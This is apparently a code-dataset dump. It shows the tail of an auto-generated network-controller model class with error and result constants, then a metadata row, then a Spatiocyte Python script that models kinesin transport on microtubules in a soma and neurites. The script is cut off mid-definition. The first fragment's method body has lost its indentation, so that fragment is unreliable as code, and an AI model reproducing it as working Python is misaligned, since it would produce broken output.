prop._addConstant("ERR-service-not-ready", None, 1539)
prop._addConstant("ERR-set-password-strength-check", None, 1543)
prop._addConstant("ERR-store-pre-login-banner-msg", None, 1521)
prop._addConstant("ERR-tacacs-enable-error", None, 1508)
prop._addConstant("ERR-tacacs-global-set-error", None, 1507)
prop._addConstant("ERR-tacacs-group-set-error", None, 1503)
prop._addConstant("ERR-tacacs-set-error", None, 1506)
prop._addConstant("ERR-user-account-expired", None, 1536)
prop._addConstant("ERR-user-set-error", None, 1517)
prop._addConstant("ERR-xml-parse-error", None, 1547)
prop._addConstant("communication-error", "communication-error", 1)
prop._addConstant("none", "none", 0)
meta.props.add("invErrCode", prop)
prop = PropMeta("str", "invErrDescr", "invErrDescr", 50, PropCategory.REGULAR)
prop.label = "Remote Error Description"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("invErrDescr", prop)
prop = PropMeta("str", "invRslt", "invRslt", 48, PropCategory.REGULAR)
prop.label = "Remote Result"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applicable"
prop._addConstant("capability-not-implemented-failure", "capability-not-implemented-failure", 16384)
prop._addConstant("capability-not-implemented-ignore", "capability-not-implemented-ignore", 8192)
prop._addConstant("capability-not-supported", "capability-not-supported", 32768)
prop._addConstant("capability-unavailable", "capability-unavailable", 65536)
prop._addConstant("end-point-failed", "end-point-failed", 32)
prop._addConstant("end-point-protocol-error", "end-point-protocol-error", 64)
prop._addConstant("end-point-unavailable", "end-point-unavailable", 16)
prop._addConstant("extend-timeout", "extend-timeout", 134217728)
prop._addConstant("failure", "failure", 1)
prop._addConstant("fru-identity-indeterminate", "fru-identity-indeterminate", 4194304)
prop._addConstant("fru-info-malformed", "fru-info-malformed", 8388608)
prop._addConstant("fru-not-ready", "fru-not-ready", 67108864)
prop._addConstant("fru-not-supported", "fru-not-supported", 536870912)
prop._addConstant("fru-state-indeterminate", "fru-state-indeterminate", 33554432)
prop._addConstant("fw-defect", "fw-defect", 256)
prop._addConstant("hw-defect", "hw-defect", 512)
prop._addConstant("illegal-fru", "illegal-fru", 16777216)
prop._addConstant("intermittent-error", "intermittent-error", 1073741824)
prop._addConstant("internal-error", "internal-error", 4)
prop._addConstant("not-applicable", "not-applicable", 0)
prop._addConstant("resource-capacity-exceeded", "resource-capacity-exceeded", 2048)
prop._addConstant("resource-dependency", "resource-dependency", 4096)
prop._addConstant("resource-unavailable", "resource-unavailable", 1024)
prop._addConstant("service-not-implemented-fail", "service-not-implemented-fail", 262144)
prop._addConstant("service-not-implemented-ignore", "service-not-implemented-ignore", 131072)
prop._addConstant("service-not-supported", "service-not-supported", 524288)
prop._addConstant("service-protocol-error", "service-protocol-error", 2097152)
prop._addConstant("service-unavailable", "service-unavailable", 1048576)
prop._addConstant("sw-defect", "sw-defect", 128)
prop._addConstant("task-reset", "task-reset", 268435456)
prop._addConstant("timeout", "timeout", 8)
prop._addConstant("unidentified-fail", "unidentified-fail", 2)
meta.props.add("invRslt", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "oDn", "oDn", 51, PropCategory.REGULAR)
prop.label = "Subject DN"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("oDn", prop)
prop = PropMeta("str", "operSt", "operSt", 15674, PropCategory.REGULAR)
prop.label = "Completion"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "scheduled"
prop._addConstant("cancelled", "cancelled", 3)
prop._addConstant("completed", "completed", 2)
prop._addConstant("crashsuspect", "crash-suspect", 7)
prop._addConstant("failed", "failed", 4)
prop._addConstant("indeterminate", "indeterminate", 5)
prop._addConstant("processing", "processing", 1)
prop._addConstant("ready", "ready", 8)
prop._addConstant("scheduled", "scheduled", 0)
prop._addConstant("suspended", "suspended", 6)
meta.props.add("operSt", prop)
prop = PropMeta("str", "originMinority", "originMinority", 54, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("originMinority", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "runId", "runId", 45, PropCategory.REGULAR)
prop.label = "ID"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("runId", prop)
prop = PropMeta("str", "startTs", "startTs", 36, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("startTs", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "try", "try", 15574, PropCategory.REGULAR)
prop.label = "Try"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("try", prop)
prop = PropMeta("str", "ts", "ts", 47, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("ts", prop)
meta.namingProps.append(getattr(meta.props, "id"))
def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps):
namingVals = [id]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
4dacaa30f927134d67f697ebba2cba98678ea517 | efbcdc04e5d2d5917328e23f62f0e2b3b585d393 | /neuron/analog2digital/soma_mt.py | 00beb221c13630b51bd31d82783f2be5ac20ea72 | [] | no_license | satya-arjunan/spatiocyte-models | 7e43457a170348638998a1382410c00e2d091cd6 | b5c29b6be758e971ba016d0334670c2afafd2c31 | refs/heads/master | 2021-01-17T00:39:29.965797 | 2018-09-06T07:46:17 | 2018-09-06T07:46:17 | 11,064,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,501 | py | import numpy as np
import math
# ---------------------------------------------------------------------------
# Geometry and population parameters (SI units: metres).
# ---------------------------------------------------------------------------
volumes = [5.8822e-18]  # reference volume used to scale molecule counts
T = 540000              # duration constant (not referenced within this chunk)
#nKinesin = 35*2.258e-17/volumes[0]
nKinesin = 100          # kinesin motors placed in the soma
pPlusEnd_Detach = 1     # reaction probability for kinesin release at MT plus end
VoxelRadius = 0.8e-8    # lattice voxel radius
nNeurite = 5            # neurites attached to the soma
nNeuriteMT = 5          # microtubules per neurite
EdgeSpace = VoxelRadius*5       # clearance between MT tips and neurite ends
neuriteRadius = 0.2e-6
MTRadius = 12.5e-9
KinesinRadius = 0.4e-8
Filaments = 13          # protofilaments per microtubule
neuriteSpace = neuriteRadius*2  # gap between adjacent neurite mouths

# Soma box: long enough for all neurite mouths plus spacing on each side.
somaLength = nNeurite*neuriteRadius*2 + neuriteSpace*(nNeurite + 1)
somaWidth = somaLength
somaHeight = neuriteRadius*4
inSomaLength = VoxelRadius*6    # portion of each neurite embedded in the soma

# Per-neurite lengths: default 5 um (plus embedded part), then staggered
# 25/20/15/10/5 um so each neurite has a distinct length.
neuriteLengths = np.empty(nNeurite)
neuriteLengths.fill(5e-6 + inSomaLength)
neuriteLengths[0] = 25e-6
neuriteLengths[1] = 20e-6
neuriteLengths[2] = 15e-6
neuriteLengths[3] = 10e-6
neuriteLengths[4] = 5e-6

# Root (bounding) compartment: soma plus the longest neurite, padded by
# rootSpace on every side.  (The original also pre-allocated throwaway
# arrays for rootLengths/somaOrigin that were immediately overwritten;
# those dead assignments are removed here.)
rootSpace = VoxelRadius*20
rootLengths = (somaWidth + np.amax(neuriteLengths) - inSomaLength + rootSpace*2,
               somaLength + rootSpace*2,
               somaHeight + rootSpace*2)
halfRootLengths = np.divide(rootLengths, 2.0)

# Soma origin, normalized to [-1, 1] relative to the root compartment centre.
# Divide-by-zero / NaN from a zero half-length are clamped to 0.
somaOrigin = (rootSpace + somaWidth/2, rootSpace + somaLength/2,
              rootSpace + somaHeight/2)
with np.errstate(divide='ignore', invalid='ignore'):
    somaOrigin = np.divide(np.subtract(somaOrigin, halfRootLengths),
                           halfRootLengths)
    somaOrigin[somaOrigin == np.inf] = 0
    somaOrigin = np.nan_to_num(somaOrigin)

# Neurite origins (normalized the same way): neurites protrude from the
# soma's +x face and are stacked along y.
neuriteOrigins = np.zeros((nNeurite, 3))
for i in range(nNeurite):
    neuriteOrigins[i] = np.array([
        rootSpace + somaWidth + (neuriteLengths[i] - inSomaLength)/2,
        rootSpace + neuriteSpace + i*(neuriteRadius*2 + neuriteSpace) + neuriteRadius,
        rootSpace + somaHeight/2])
    with np.errstate(divide='ignore', invalid='ignore'):
        neuriteOrigins[i] = np.divide(np.subtract(neuriteOrigins[i],
                                                  halfRootLengths),
                                      halfRootLengths)
        neuriteOrigins[i][neuriteOrigins[i] == np.inf] = 0
        neuriteOrigins[i] = np.nan_to_num(neuriteOrigins[i])
def rotatePointAlongVector(P, C, N, angle):
    """Rotate point P about the axis through C with direction N.

    P, C and N are 3-element sequences; `angle` is in radians and the
    rotation follows the right-hand rule about N (assumed unit length).
    Returns the rotated point as a list [x, y, z].
    """
    px, py, pz = P[0], P[1], P[2]
    cx, cy, cz = C[0], C[1], C[2]
    ux, uy, uz = N[0], N[1], N[2]
    ux2 = ux*ux
    uy2 = uy*uy
    uz2 = uz*uz
    cos_t = math.cos(angle)
    sin_t = math.sin(angle)
    one_m_cos = 1-cos_t
    # Rodrigues-style closed form for rotation about an arbitrary axis.
    rx = (cx*(uy2+uz2)-ux*(cy*uy+cz*uz-ux*px-uy*py-uz*pz))*one_m_cos+px*cos_t+(
        -cz*uy+cy*uz-uz*py+uy*pz)*sin_t
    ry = (cy*(ux2+uz2)-uy*(cx*ux+cz*uz-ux*px-uy*py-uz*pz))*one_m_cos+py*cos_t+(
        cz*ux-cx*uz+uz*px-ux*pz)*sin_t
    rz = (cz*(ux2+uy2)-uz*(cx*ux+cy*uy-ux*px-uy*py-uz*pz))*one_m_cos+pz*cos_t+(
        -cy*ux+cx*uy-uy*px+ux*py)*sin_t
    return [rx, ry, rz]
# Microtubule lengths: each MT spans its neurite minus EdgeSpace at both ends.
MTLengths = np.zeros(nNeurite)
for i in range(len(neuriteLengths)):
    MTLengths[i] = neuriteLengths[i] - 2*EdgeSpace

# Normalized (-1..1) cross-sectional origin offsets of each MT inside its
# neurite.  Explicit layouts exist for 1-4 MTs per neurite; for 5 or more,
# one MT is placed off-centre on +y and the others are that point rotated in
# equal steps about the neurite (x) axis.
# FIX: the original code referenced an undefined name `neuriteRadii` in the
# 2/3/4-MT branches (a latent NameError — those branches never ran with
# nNeuriteMT = 5).  All neurites share `neuriteRadius`, which is used here.
MTsOriginX = np.zeros((nNeurite, nNeuriteMT))
MTsOriginY = np.zeros((nNeurite, nNeuriteMT))
MTsOriginZ = np.zeros((nNeurite, nNeuriteMT))
for i in range(nNeurite):
    if nNeuriteMT == 1:
        # Single MT on the neurite axis.
        MTsOriginX[i][0] = 0.0
        MTsOriginY[i][0] = 0.0
        MTsOriginZ[i][0] = 0.0
    elif nNeuriteMT == 2:
        # Two MTs mirrored about the axis along y.
        space = (neuriteRadius*2 - MTRadius*2*2)/(2 + 2)
        MTsOriginY[i][0] = -1 + (space + MTRadius)/neuriteRadius
        MTsOriginY[i][1] = 1 - (space + MTRadius)/neuriteRadius
    elif nNeuriteMT == 3:
        # Three MTs at 120-degree spacing in the y-z plane.
        y = neuriteRadius*math.cos(math.pi/3)
        y2 = y*math.cos(math.pi/3)
        z = y*math.sin(math.pi/3)
        MTsOriginY[i][0] = y/neuriteRadius
        MTsOriginY[i][1] = -y2/neuriteRadius
        MTsOriginZ[i][1] = -z/neuriteRadius
        MTsOriginY[i][2] = -y2/neuriteRadius
        MTsOriginZ[i][2] = z/neuriteRadius
    elif nNeuriteMT == 4:
        # Two MTs along y and two along z, evenly spaced.
        space = (neuriteRadius*2 - MTRadius*2*2)/(2 + 3)
        MTsOriginY[i][0] = -1 + (space + MTRadius)/neuriteRadius
        MTsOriginY[i][1] = 1 - (space + MTRadius)/neuriteRadius
        space = (neuriteRadius*2 - MTRadius*2*2)/(2 + 3)
        MTsOriginZ[i][2] = -1 + (space + MTRadius)/neuriteRadius
        MTsOriginZ[i][3] = 1 - (space + MTRadius)/neuriteRadius
    else:
        # First MT at 2/3 of the radius on +y; indices 1..nNeuriteMT-2 are
        # that point rotated about the x axis in steps of 2*pi/(nNeuriteMT-1).
        # The last MT keeps the default (0,0,0) offset, i.e. the axis.
        MTsOriginY[i][0] = 2*2.0/6
        P = [0.0, MTsOriginY[i][0], 0.0]
        C = [0.0, 0.0, 0.0]
        N = [1.0, 0.0, 0.0]
        angle = 2*math.pi/(nNeuriteMT - 1)
        for j in range(nNeuriteMT - 2):
            P = rotatePointAlongVector(P, C, N, angle)
            MTsOriginX[i][j + 1] = P[0]
            MTsOriginY[i][j + 1] = P[1]
            MTsOriginZ[i][j + 1] = P[2]
# --- Simulator, root compartment and soma -----------------------------------
# `theSimulator` is injected by the E-Cell/Spatiocyte runtime that loads this
# model script; `sim` is a local alias.
sim = theSimulator
s = sim.createStepper('SpatiocyteStepper', 'SS')
s.VoxelRadius = VoxelRadius
s.SearchVacant = 1
s.RemoveSurfaceBias = 1
sim.rootSystem.StepperID = 'SS'
# Root (bounding) compartment dimensions computed above.
sim.createEntity('Variable', 'Variable:/:LENGTHX').Value = rootLengths[0]
sim.createEntity('Variable', 'Variable:/:LENGTHY').Value = rootLengths[1]
sim.createEntity('Variable', 'Variable:/:LENGTHZ').Value = rootLengths[2]
sim.createEntity('Variable', 'Variable:/:VACANT')
#sim.createEntity('System', 'System:/:Surface').StepperID = 'SS'
#sim.createEntity('Variable', 'Variable:/Surface:DIMENSION').Value = 2
#sim.createEntity('Variable', 'Variable:/Surface:VACANT')
# Soma compartment: GEOMETRY 0 (box) with explicit side lengths and a
# normalized origin relative to the root compartment centre.
sim.createEntity('System', 'System:/:Soma').StepperID = 'SS'
sim.createEntity('Variable', 'Variable:/Soma:GEOMETRY').Value = 0
sim.createEntity('Variable', 'Variable:/Soma:LENGTHX').Value = somaWidth
sim.createEntity('Variable', 'Variable:/Soma:LENGTHY').Value = somaLength
sim.createEntity('Variable', 'Variable:/Soma:LENGTHZ').Value = somaHeight
sim.createEntity('Variable', 'Variable:/Soma:ORIGINX').Value = somaOrigin[0]
sim.createEntity('Variable', 'Variable:/Soma:ORIGINY').Value = somaOrigin[1]
sim.createEntity('Variable', 'Variable:/Soma:ORIGINZ').Value = somaOrigin[2]
sim.createEntity('Variable', 'Variable:/Soma:VACANT').Value = -1
# Soma membrane: a 2-D surface subcompartment of the soma.
sim.createEntity('System', 'System:/Soma:Surface').StepperID = 'SS'
sim.createEntity('Variable', 'Variable:/Soma/Surface:DIMENSION').Value = 2
sim.createEntity('Variable', 'Variable:/Soma/Surface:VACANT')
# --- Neurite compartments and their microtubules ----------------------------
for i in range(nNeurite):
    # Neurite compartment: GEOMETRY 2 (presumably a rod/cylinder — confirm
    # against Spatiocyte compartment docs), length along x, diameter = 2r.
    sim.createEntity('System', 'System:/:Neurite%d' %i).StepperID = 'SS'
    sim.createEntity('Variable', 'Variable:/Neurite%d:GEOMETRY' %i).Value = 2
    x = sim.createEntity('Variable', 'Variable:/Neurite%d:LENGTHX' %i)
    x.Value = neuriteLengths[i]
    y = sim.createEntity('Variable', 'Variable:/Neurite%d:LENGTHY' %i)
    y.Value = neuriteRadius*2
    x = sim.createEntity('Variable', 'Variable:/Neurite%d:ORIGINX' %i)
    x.Value = neuriteOrigins[i][0]
    y = sim.createEntity('Variable', 'Variable:/Neurite%d:ORIGINY' %i)
    y.Value = neuriteOrigins[i][1]
    sim.createEntity('Variable', 'Variable:/Neurite%d:ORIGINZ' %i).Value = 0
    sim.createEntity('Variable', 'Variable:/Neurite%d:VACANT' %i)
    # Make the neurite lumen diffusively connected to the soma volume.
    d = sim.createEntity('Variable', 'Variable:/Neurite%d:DIFFUSIVE' %i)
    d.Name = '/:Soma'
    # Create the neurite membrane:
    sim.createEntity('System', 'System:/Neurite%d:Surface' %i).StepperID = 'SS'
    sim.createEntity('Variable',
                     'Variable:/Neurite%d/Surface:DIMENSION' %i).Value = 2
    sim.createEntity('Variable', 'Variable:/Neurite%d/Surface:VACANT' %i)
    # Neurite membrane is diffusively continuous with the soma membrane.
    sim.createEntity('Variable',
                     'Variable:/Neurite%d/Surface:DIFFUSIVE' %i).Name = '/Soma:Surface'
    # One MicrotubuleProcess per MT, positioned by the normalized offsets
    # computed earlier.  The referenced variables are the tubulin subunit
    # species; the '-1'/'-2'/'-3' coefficients appear to designate the vacant
    # (TUB), minus-end (TUB_M) and plus-end (TUB_P) species — confirm with
    # the MicrotubuleProcess documentation.
    for j in range(nNeuriteMT):
        m = sim.createEntity('MicrotubuleProcess',
                             'Process:/Neurite%d:Microtubule%d' %(i, j))
        m.OriginX = MTsOriginX[i][j]
        m.OriginY = MTsOriginY[i][j]
        m.OriginZ = MTsOriginZ[i][j]
        m.RotateX = 0
        m.RotateY = 0
        m.RotateZ = 0
        m.Radius = MTRadius
        m.SubunitRadius = KinesinRadius
        m.Length = MTLengths[i]
        m.Filaments = Filaments
        m.Periodic = 0
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:aTUB']]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB', '-1']]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_M', '-2']]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P', '-3']]
# --- Microtubules inside the soma -------------------------------------------
# 16 evenly spaced y-positions, each with three MTs stacked in z
# (centre, +0.5 and -0.5 normalized offsets).
nSomaMT = 16
mtSpaceY = somaLength/(nSomaMT)
for i in range(nSomaMT):
    for j in range(3):
        OriginZ = 0.0
        if(j != 0):
            if(j == 1):
                OriginZ = 0.5
            else:
                OriginZ = -0.5
        m = theSimulator.createEntity('MicrotubuleProcess',
                                      'Process:/Soma:Microtubule%d%d' %(i,j))
        m.OriginX = 0
        # Normalize the i-th y slot to the [-1, 1] range of the soma length.
        m.OriginY = (mtSpaceY/2+i*mtSpaceY)/(somaLength/2)-1
        m.OriginZ = OriginZ
        m.RotateX = 0
        m.RotateY = 0
        m.RotateZ = 0
        m.Radius = MTRadius
        m.SubunitRadius = KinesinRadius
        m.Length = somaWidth*0.8
        m.Filaments = Filaments
        m.Periodic = 0
        # Same species references as the neurite MTs (see above).
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP' ]]
        m.VariableReferenceList = [['_', 'Variable:/Soma:aTUB']]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB', '-1']]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_M', '-2']]
        m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P', '-3']]
# --- Species populations -----------------------------------------------------
# Only free kinesin (KIF) starts populated; every tubulin-bound state starts
# at zero and is produced by the reactions below.
sim.createEntity('Variable', 'Variable:/Soma:KIF').Value = nKinesin
sim.createEntity('Variable', 'Variable:/Soma:TUB_GTP' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_KIF' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_KIF_ATP' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_GTP_KIF' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_GTP_KIF_ATP' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:aTUB' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_M' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_P' ).Value = 0

# --- Visualization logging ---------------------------------------------------
# Logs coordinates of the listed species every LogInterval (presumably
# seconds of simulated time — confirm with VisualizationLogProcess docs).
v = sim.createEntity('VisualizationLogProcess', 'Process:/Soma:v')
#v.VariableReferenceList = [['_', 'Variable:/Soma:TUB']]
v.VariableReferenceList = [['_', 'Variable:/Soma:aTUB']]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_M']]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P']]
v.VariableReferenceList = [['_', 'Variable:/Soma:KIF']]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP']]
#v.VariableReferenceList = [['_', 'Variable:/Soma/Surface:VACANT']]
#v.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:PlusSensor']]
#v.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:MinusSensor']]
v.LogInterval = 10
#Populate-----------------------------------------------------------------------
# MoleculePopulateProcess places the initial copies of each species onto the
# lattice at simulation start.
#p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pPlusSensor')
#p.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:PlusSensor']]
#p.EdgeX = 1
#
#p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pMinusSensor')
#p.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:MinusSensor']]
#p.EdgeX = -1

# TUB_KIF starts at 0 copies (set above), so this populate is effectively a
# no-op unless that count is changed.
p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pTUB_KIF')
p.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF']]

#p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pTUB_GTP')
#p.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP']]
#p.LengthBinFractions = [1, 0.3, 0.8]
#p.Priority = 100 #set high priority for accurate fraction

# Distribute the nKinesin free motors in the soma.
p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pKIF')
p.VariableReferenceList = [['_', 'Variable:/Soma:KIF']]
#-------------------------------------------------------------------------------
#Cytosolic KIF recruitment to microtubule---------------------------------------
# DiffusionInfluencedReactionProcess: in each pair, coefficient '-1' marks a
# reactant and '1' a product; `p` is the per-collision reaction probability.
# b1: free KIF binds a vacant MT subunit (TUB) with low probability.
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:b1')
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.p = 0.0001

# b2: binding to GTP-tubulin is disabled (p = 0).
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:b2')
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.p = 0

# b3: binding to "activated" tubulin (aTUB) is strongly favoured.
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:b3')
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.p = 0.9
#-------------------------------------------------------------------------------
#MT KIF detachment to cytosol---------------------------------------------------
# First-order detachment (rate k, per second) of ATP-bound kinesin from the
# MT lattice; the vacated subunit is left as aTUB (or TUB_GTP below).
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:detach')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.SearchVacant = 1
r.k = 15

r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:detachGTP')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.SearchVacant = 1
r.k = 15
#-------------------------------------------------------------------------------
#Active tubulin inactivation----------------------------------------------------
# i1: aTUB relaxes back to plain TUB.
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:i1')
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.k = 0.055
#-------------------------------------------------------------------------------
#MT KIF detachment to cytosol at plus end---------------------------------------
# When any kinesin-carrying subunit state contacts a plus-end subunit
# (TUB_P), the kinesin is released to the cytosol; TUB_P itself is conserved
# (it appears as both reactant and product).
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach

r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach

r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p3')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach

r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p4')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach
#-------------------------------------------------------------------------------
#KIF ATP hydrolysis-------------------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:h1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.SearchVacant = 1
r.k = 100
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:h2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.SearchVacant = 1
r.k = 100
#-------------------------------------------------------------------------------
#KIF ADP phosphorylation--------------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:phos1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']]
r.SearchVacant = 1
r.k = 145
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:phos2')
